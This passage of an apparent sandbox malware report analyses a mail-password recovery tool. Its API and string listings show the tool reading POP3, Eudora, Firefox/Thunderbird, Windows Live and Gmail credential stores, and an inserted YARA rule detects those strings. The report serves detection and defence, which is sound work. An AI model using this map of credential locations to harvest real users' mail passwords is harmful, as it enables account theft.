                  • Opcode ID: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                  • Instruction ID: 0f5ec9c9176e8b350c57746001926e44edf78976103d06fec131b918f38f0bed
                  • Opcode Fuzzy Hash: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                  • Instruction Fuzzy Hash: 02315871D01219AFCB21DFA1CC44BDEBBB8AF49314F1040B6E505B7290D6789B88DB98
                  APIs
                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F6F,?,?), ref: 00405E75
                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F6F,?,?), ref: 00405E93
                  • strlen.MSVCRT ref: 00405EA0
                  • strcpy.MSVCRT(?,?,?,?,00405F6F,?,?), ref: 00405EB0
                  • LocalFree.KERNEL32(?,?,?,00405F6F,?,?), ref: 00405EBA
                  • strcpy.MSVCRT(?,Unknown Error,?,?,00405F6F,?,?), ref: 00405ECA
                  Strings
                  Yara matches
                  Similarity
                  • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                  • String ID: Unknown Error$netmsg.dll
                  • API String ID: 3198317522-572158859
                  • Opcode ID: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                  • Instruction ID: ee7e3b4bfe4f381a5a8dca6b6b4a58a66687d49b648cda9812902ba604a22f70
                  • Opcode Fuzzy Hash: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                  • Instruction Fuzzy Hash: DC01D432604214BEEB245B61DC46EDF7E68EB09796B20403AF602B41D0DA759F40DADC
                  APIs
                    • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                  • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408339
                  • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408349
                  • GetPrivateProfileIntA.KERNEL32(004182C0,rtl,00000000,004181B8), ref: 0040835A
                    • Part of subcall function 00407F2B: GetPrivateProfileStringA.KERNEL32(004182C0,?,0041344F,00418308,?,004181B8), ref: 00407F46
                  Strings
                  Yara matches
                  Similarity
                  • API ID: PrivateProfilestrcpy$AttributesFileString
                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                  • API String ID: 185930432-2039793938
                  • Opcode ID: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                  • Instruction ID: 927989a77509199662194d441518c64dc34f1856eccff2a3d84bf87df20cc289
                  • Opcode Fuzzy Hash: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                  • Instruction Fuzzy Hash: 00F0C232EC421539C62036615C07FEA3A148BE2F10F08447FBD04B61C2EA7D49D1815E
                  APIs
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                  • ??2@YAPAXI@Z.MSVCRT ref: 004088FD
                  • ??2@YAPAXI@Z.MSVCRT ref: 00408919
                  • memcpy.MSVCRT ref: 00408941
                  • memcpy.MSVCRT ref: 0040895E
                  • ??2@YAPAXI@Z.MSVCRT ref: 004089E7
                  • ??2@YAPAXI@Z.MSVCRT ref: 004089F1
                  • ??2@YAPAXI@Z.MSVCRT ref: 00408A29
                    • Part of subcall function 00407A69: LoadStringA.USER32(00000000,0000000D,00000FFF,?), ref: 00407B32
                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76F90A60), ref: 00407AE4
                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                  Similarity
                  • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                  • String ID: d$xA
                  • API String ID: 3781940870-3129348561
                  • Opcode ID: a9e448af71377d593719d1af80ff4ac58293a826cf4ccc803acad48c6db5bab3
                  • Instruction ID: 74bd4705b90376de5a47ec474c9ee228b959cea471a61b54eb6c1cdd4b9bc2c0
                  • Opcode Fuzzy Hash: a9e448af71377d593719d1af80ff4ac58293a826cf4ccc803acad48c6db5bab3
                  • Instruction Fuzzy Hash: 62515C71A01704AFD724DF39C58179ABBE4EF48354F10852EE59ADB381DB74A941CF44
                  APIs
                    • Part of subcall function 004030F9: GetPrivateProfileStringA.KERNEL32(00000000,?,0041344F,?,?,?), ref: 0040311D
                  • strchr.MSVCRT ref: 0040323C
                  Similarity
                  • API ID: PrivateProfileStringstrchr
                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                  • API String ID: 1348940319-1729847305
                  • Opcode ID: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                  • Instruction ID: 730259ebfdc93430ac8a7640b0a1394381beeb8186f258e339b1e1584fb818e0
                  • Opcode Fuzzy Hash: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                  • Instruction Fuzzy Hash: FF31917150420ABEEF219F60CC06FD97F6CAF10359F10806AF558761D2CBB9AB949B54
                  Similarity
                  • API ID: memcpy
                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                  • API String ID: 3510742995-3273207271
                  • Opcode ID: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
                  • Instruction ID: b4a8218c7fa3979214449631b2efcde822773b41d0541f29ded2a506b887ed0e
                  • Opcode Fuzzy Hash: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
                  • Instruction Fuzzy Hash: FF01DFB2EC465025DA7100092C86FE70A494BFAB11FB50137F98533AC4E0AD0CCF829F
                  APIs
                    • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                  • memset.MSVCRT ref: 0040DF75
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040DF8C
                  • _strnicmp.MSVCRT ref: 0040DFA6
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFD2
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFF2
                  Similarity
                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                  • String ID: WindowsLive:name=*$windowslive:name=
                  • API String ID: 945165440-3589380929
                  • Opcode ID: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
                  • Instruction ID: faca0abe0adb4f8b424a3cc142a11908341e250f8e36283e96c9ece6c5c035f0
                  • Opcode Fuzzy Hash: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
                  • Instruction Fuzzy Hash: 14419FB1508345AFC320DF15D8848ABBBECEB84344F00493EF999A2291D734ED48CB66
                  APIs
                  • wcslen.MSVCRT ref: 00411146
                  • ??2@YAPAXI@Z.MSVCRT ref: 0041114F
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104C3
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104E1
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104FC
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410525
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410549
                  • strlen.MSVCRT ref: 004111AB
                    • Part of subcall function 0041061F: ??3@YAXPAX@Z.MSVCRT ref: 0041062A
                    • Part of subcall function 0041061F: ??2@YAPAXI@Z.MSVCRT ref: 00410639
                  • memcpy.MSVCRT ref: 004111C5
                  • ??3@YAXPAX@Z.MSVCRT ref: 00411258
                  Similarity
                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                  • String ID: <UA
                  • API String ID: 577244452-338107889
                  • Opcode ID: f2f762125e1423e49e6bcb13a5991785930390a1f9f2de13f6984d67d91fd659
                  • Instruction ID: 068040a7654b3252a10ead66c722fc8ae16d1693d490f738ed846916017eff7d
                  • Opcode Fuzzy Hash: f2f762125e1423e49e6bcb13a5991785930390a1f9f2de13f6984d67d91fd659
                  • Instruction Fuzzy Hash: 21314472D04219ABCF21EF65C8809DDBBB5AF49314F0481AAE608A3251CB396FD5CF59
                  APIs
                  • memset.MSVCRT ref: 0040817B
                  • GetDlgCtrlID.USER32(?), ref: 00408186
                  • GetWindowTextA.USER32(?,?,00001000), ref: 00408199
                  • memset.MSVCRT ref: 004081BF
                  • GetClassNameA.USER32(?,?,000000FF), ref: 004081D2
                  • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 004081E4
                    • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                  Similarity
                  • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                  • String ID: sysdatetimepick32
                  • API String ID: 896699463-4169760276
                  • Opcode ID: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                  • Instruction ID: 8ec491919e3a594e32bcc0b3aeb202d37a515ee6f0006301200e52d8450d0196
                  • Opcode Fuzzy Hash: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                  • Instruction Fuzzy Hash: 2311EC7280511C7EE7119B54DD41EEB7BACEF19355F0400BBFA44E2152EA789FC48B68
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 004057C7
                  • GetDlgItem.USER32(?,000003E9), ref: 004057DA
                  • GetDlgItem.USER32(?,000003E9), ref: 004057EF
                  • GetDlgItem.USER32(?,000003E9), ref: 00405807
                  • EndDialog.USER32(?,00000002), ref: 00405823
                  • EndDialog.USER32(?,00000001), ref: 00405836
                    • Part of subcall function 004054D0: GetDlgItem.USER32(?,000003E9), ref: 004054DE
                    • Part of subcall function 004054D0: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054F3
                    • Part of subcall function 004054D0: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 0040550F
                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 0040584E
                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 0040595A
                  Similarity
                  • API ID: Item$DialogMessageSend
                  • String ID:
                  • API String ID: 2485852401-0
                  • Opcode ID: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                  • Instruction ID: 327bdf07108b1d48d13abdf232bd1ccce71b7be96730af3de4981d1ea2c32abc
                  • Opcode Fuzzy Hash: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                  • Instruction Fuzzy Hash: 6561C031600A05AFDB25BF25C886A2BB3A5FF40725F00C23EF915A72D1D778A960CF49
                  Similarity
                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                  • String ID:
                  • API String ID: 2313361498-0
                  • Opcode ID: 1c45e02bf6d6e0acd6632af5bc3a0aaa414ad192b3bff06ac025739c61ab6296
                  • Instruction ID: c9d5e52e17e49b2fdf2665c470f327c4663aeb176fcf1135955ad165868745cd
                  • Opcode Fuzzy Hash: 1c45e02bf6d6e0acd6632af5bc3a0aaa414ad192b3bff06ac025739c61ab6296
                  • Instruction Fuzzy Hash: 113183B2600601AFDB249F79D985A2AF7A4FB08354710863FF55AD7290DB78AC50CF58
                  APIs
                  • GetSystemMetrics.USER32(00000011), ref: 004064AC
                  • GetSystemMetrics.USER32(00000010), ref: 004064B2
                  • GetDC.USER32(00000000), ref: 004064C0
                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064D2
                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004064DB
                  • ReleaseDC.USER32(00000000,004012E4), ref: 004064E4
                  • GetWindowRect.USER32(004012E4,?), ref: 004064F1
                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00406536
                  Similarity
                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                  • String ID:
                  • API String ID: 1999381814-0
                  • Opcode ID: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                  • Instruction ID: ba7d715333d017d2103329686637bd52cca5eef1020c3fd7483cce7c10731540
                  • Opcode Fuzzy Hash: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                  • Instruction Fuzzy Hash: 1011A232A00219AFDF109FB8DC09BEF7FB9EB44351F054135EE06E3290DA70A9418A90
                  APIs
                  • DestroyWindow.USER32(?), ref: 0040B258
                  • SetFocus.USER32(?,?,?), ref: 0040B2FE
                  • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3FB
                  Similarity
                  • API ID: DestroyFocusInvalidateRectWindow
                  • String ID: (@A$84A$pEA
                  • API String ID: 3502187192-3946309182
                  • Opcode ID: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                  • Instruction ID: b7bc1b810a9c946c48dae79992a2e7083b23304991c1a6466db7751271d6d75f
                  • Opcode Fuzzy Hash: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                  • Instruction Fuzzy Hash: B75186306047019BCB20BF658845E9AB3E5FF50724F54C53FF8696B2E2C7799A818B8D
                  Similarity
                  • API ID: memcpymemset$strlen$_memicmp
                  • String ID: user_pref("
                  • API String ID: 765841271-2487180061
                  • Opcode ID: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
                  • Instruction ID: c71e9d7c33fd880144b5893e014edb1d15ca38a86f0d2a268660e68eb467e50f
                  • Opcode Fuzzy Hash: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
                  • Instruction Fuzzy Hash: 134168769041199ADB14EB95DCC0EDA77AC9F44314F1083BBE605F7181EA389F49CF68
                  APIs
                  • strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76F90A60), ref: 00407AE4
                    • Part of subcall function 00407EF3: _itoa.MSVCRT ref: 00407F14
                  • strlen.MSVCRT ref: 00407B02
                  • LoadStringA.USER32(00000000,0000000D,00000FFF,?), ref: 00407B32
                  • memcpy.MSVCRT ref: 00407B71
                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A0F
                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A2D
                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A4B
                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A5B
                  Similarity
                  • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                  • String ID: O4A$strings
                  • API String ID: 1748916193-3524047076
                  • Opcode ID: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                  • Instruction ID: 4e35bd01ad2207757dd6e5c19dba2cefa7e6d732e740aa6e4bc5455c9760af59
                  • Opcode Fuzzy Hash: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                  • Instruction Fuzzy Hash: BA315771A08101AFD7159B58ED80DA63777E744348750807EEC01A72A2DF39BD81CF5E
                  APIs
                  • memset.MSVCRT ref: 004071F7
                    • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,0040738B,?,000000FD,00000000,00000000,?,00000000,0040738B,?,?,?,?,00000000), ref: 00407292
                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,76DBEB20,?), ref: 004072A2
                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                  Similarity
                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                  • String ID: POP3_credentials$POP3_host$POP3_name
                  • API String ID: 604216836-2190619648
                  • Opcode ID: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
                  • Instruction ID: 7a8ee4d7bc4178ad58e78f2f27b608862355488638afca077fa6fa925b8dfb39
                  • Opcode Fuzzy Hash: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
                  • Instruction Fuzzy Hash: D8315075A4025DAFCB11EB69CC81ADE7BBCEB59344F0080B6FA04B3141D6349F598F65
                  Similarity
                  • API ID: ItemMenu$CountInfomemsetstrchr
                  • String ID: 0$6
                  • API String ID: 2300387033-3849865405
                  • Opcode ID: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                  • Instruction ID: 51172b8e10bed5c2f97a320ed5cd446e6bfcd9d4694fda0f565c00a2b2434e31
                  • Opcode Fuzzy Hash: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                  • Instruction Fuzzy Hash: 7821D171108384AFC710CF65C981A9BB7E8FF88348F04453EF6C4AA280DB79D955CB5A
                  APIs
                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                  • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 00404575
                  • _stricmp.MSVCRT(?,imap), ref: 00404593
                  Similarity
                  • API ID: _stricmp$memcpystrlen
                  • String ID: imap$pop3$smtp
                  • API String ID: 445763297-821077329
                  • Opcode ID: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                  • Instruction ID: 5d3aebf2a9f6afee3de7fcc7c39c9e230d3229a718a14b09e3d1f3abdf4e177e
                  • Opcode Fuzzy Hash: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                  • Instruction Fuzzy Hash: 842151B3500318AFD711DB61CD42BDAB7F8AF54304F10056BE649B3181DB787B858B95
                  APIs
                    • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                    • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                    • Part of subcall function 0040EF77: memcpy.MSVCRT ref: 0040EFD7
                    • Part of subcall function 0040EF77: CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                  • strchr.MSVCRT ref: 004036E0
                  • strcpy.MSVCRT(?,00000001,?,?,?), ref: 00403709
                  • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403719
                  • strlen.MSVCRT ref: 00403739
                  • sprintf.MSVCRT ref: 0040375D
                  • strcpy.MSVCRT(?,?), ref: 00403773
                  Similarity
                  • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                  • String ID: %s@gmail.com
                  • API String ID: 2649369358-4097000612
                  • Opcode ID: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                  • Instruction ID: 644cd556ee9d6f83430fbc5f755ed5fad511d56830514e9de795baf2bfcfc341
                  • Opcode Fuzzy Hash: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                  • Instruction Fuzzy Hash: 8B21DEF280411D5EDB21DB54CD85FDA77ACBB14308F0401AFF609E2181EAB89BC48B69
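The API and String ID groupings in the function entries above are enough material for a first-pass hunting rule. The rule below is an added example; it is not part of the Joe Sandbox report and is not either of the Yara rules that matched the sample. Every string in it is copied from a String ID or string xref listed in the entries above: the Eudora INI account keys read through GetPrivateProfileStringA, the POP3_* registry value names read through RegQueryValueExA, the Firefox/Thunderbird prefs.js marker, the Windows Live credential target prefix (which appears in the sample in both casings), the format string that appends a Gmail domain to a bare user name, and the GUID handed to UuidFromStringA. The rule name, the grouping of strings, the match thresholds and the 2MB file-size cap are assumptions made for this example. Because the sample is the Mail PassView tool itself, a hit identifies this credential-recovery code wherever it turns up, whether run as a standalone PUA or bundled into a stealer such as the BabyShark/KimJongRAT family the second Yara rule targets; treat a match as a triage lead, not as proof of malicious intent.

```yara
rule MailPassView_credential_recovery_strings
{
    meta:
        description = "Mail PassView style mail credential recovery code; strings taken from Joe Sandbox analysis 1446234"
        note        = "Example rule added to this report page; not the report's own Yara rule"
    strings:
        // Eudora INI account keys read via GetPrivateProfileStringA
        $eudora1 = "PopAccount" ascii
        $eudora2 = "SavePasswordText" ascii
        $eudora3 = "ReturnAddress" ascii
        // Registry value names queried via RegQueryValueExA
        $pop3_1  = "POP3_credentials" ascii
        $pop3_2  = "POP3_host" ascii
        // Firefox / Thunderbird prefs.js parsing marker
        $ffpref  = "user_pref(\"" ascii
        // Windows Live credential target prefix; nocase covers both casings seen in the sample
        $wlive   = "windowslive:name=" ascii nocase
        // Format string that appends a Gmail domain to a bare user name
        $gmail   = "%s@gmail.com" ascii
        // GUID string handed to UuidFromStringA
        $guid    = "5e7e8100-9138-11d1-945a-00c04fc308ff" ascii
    condition:
        // PE magic and a size cap (assumed; the sample is a small 32-bit PE)
        uint16(0) == 0x5A4D and
        filesize < 2MB and
        (
            2 of ($eudora*) or
            all of ($pop3*) or
            3 of ($ffpref, $wlive, $gmail, $guid)
        )
}
```

Keep the three sub-conditions separate rather than one flat "N of them": each group corresponds to one credential store the sample reads, so a partial hit still tells you which recovery routine is present, and a packed copy that only exposes one store's strings after unpacking still fires.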
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpystrlen$memsetsprintf
                  • String ID: %s (%s)
                  • API String ID: 3756086014-1363028141
                  • Opcode ID: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                  • Instruction ID: 724a4194cae70d0bf31fff2aa5a30eca349b7c3c60a55174e1cb3006c7faee74
                  • Opcode Fuzzy Hash: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                  • Instruction Fuzzy Hash: 2F1190B2800159AFDB21DF58CD44BDABBACEF45308F00856AFB48EB102D275EA55CB94
                  APIs
                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                  • memcpy.MSVCRT ref: 0040EFD7
                  • CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                  Strings
                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040EF89
                  • 00000000-0000-0000-0000-000000000000, xrefs: 0040EF96
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FromStringUuid$FreeTaskmemcpy
                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                  • API String ID: 1640410171-3316789007
                  • Opcode ID: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                  • Instruction ID: e50974e3e7746184743268e00a497f96c507105008b10ce8b40323224852ed78
                  • Opcode Fuzzy Hash: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                  • Instruction Fuzzy Hash: A501807691012EBACF11AAA5CD40EEF7BACEF48354F004437FD15E7141E634EA548BA4
                  APIs
                    • Part of subcall function 0040A175: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
                    • Part of subcall function 0040A175: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                  • LoadIconA.USER32(000000CE), ref: 00409FE7
                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                  • LoadIconA.USER32(000000CF), ref: 0040A005
                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                  • SendMessageA.USER32(?,00001003,00000002,?), ref: 0040A025
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                  • String ID:
                  • API String ID: 3673709545-0
                  • Opcode ID: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                  • Instruction ID: 4e57101e09f8a627107abf71349708af879b5e1eab1c783dad4143a9e5363d44
                  • Opcode Fuzzy Hash: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                  • Instruction Fuzzy Hash: 3101EC71280704BFFA316B60DE4BFD67AA6EB48B05F004425F359690E1C7F56D51DB18
                  APIs
                    • Part of subcall function 0040A175: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
                    • Part of subcall function 0040A175: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                  • LoadIconA.USER32(000000CE), ref: 00409FE7
                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                  • LoadIconA.USER32(000000CF), ref: 0040A005
                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                  • SendMessageA.USER32(?,00001003,00000002,?), ref: 0040A025
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                  • String ID:
                  • API String ID: 3673709545-0
                  • Opcode ID: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
                  • Instruction ID: 4681c035099bb4a28d1464aa710f9ac1d1cdfab18a2ba86be57a79ad66400e71
                  • Opcode Fuzzy Hash: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
